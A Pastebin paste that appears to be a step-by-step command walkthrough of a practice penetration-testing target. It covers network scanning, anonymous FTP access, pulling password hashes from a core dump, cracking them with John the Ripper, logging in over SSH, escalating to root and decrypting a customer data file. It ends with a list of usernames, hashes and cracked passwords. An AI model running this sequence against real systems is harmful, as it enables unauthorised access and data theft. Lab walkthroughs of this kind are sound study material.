Advertisement
Guest User

g0tmi1k

a guest
Feb 12th, 2010
2,210
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.53 KB | None | 0 0
  1. nmap -n 192.168.1.1-255
  2.  
  3. nmap -n -sS -sV -O 192.168.1.110
  4.  
  5. firefox 192.168.1.110
  6.  
  7. [+]kate -> make list of possible usernames
  8.  
  9. // lastF, fLast
  10.  
  11. ftp 192.168.1.110
  12.  
  13. // Username: anonymous. Password: [Blank]
  14.  
  15. ls -a
  16.  
  17. cd download
  18.  
  19. ls -a
  20.  
  21. cd etc
  22.  
  23. ls -a
  24.  
  25. get core
  26.  
  27. exit
  28.  
  29. strings core
  30.  
  31. [+]Copy from 'root:$...' to '[EOF]'. Kate -> New -> Paste. Format so each username is one its own line -> Save. Filename: shadow
  32.  
  33. cd tools/dictionary/
  34.  
  35. cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords
  36.  
  37.  
  38.  
  39. john
  40.  
  41. ./john --rules --wordlist=/root/passwords /root/shadow
  42. //Password: root:Complexity & ccofee:Diatomaceous
  43.  
  44. ssh ccofee@192.168.1.110
  45. //Password: Diatomaceous
  46.  
  47. ls -a
  48.  
  49. cd ..
  50.  
  51. ls -a
  52.  
  53. cd root/
  54.  
  55. ls -a
  56.  
  57. cd .save/
  58.  
  59. su
  60. //Password: Complexity
  61.  
  62. cd .save/
  63.  
  64. ls -a
  65.  
  66. cat copy.sh
  67.  
  68. openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
  69.  
  70. ls -a
  71.  
  72. cat customer_account.csv
  73. // GAME OVER
  74.  
  75.  
  76.  
  77. ----------------------------------------------------------------------------------------------------
  78. Users
  79. root:Complexity      = root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
  80. aadams:              = aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
  81. bbanter:Zymurgy      = bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
  82. ccoffee:Diatomaceous = ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
  83. ----------------------------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement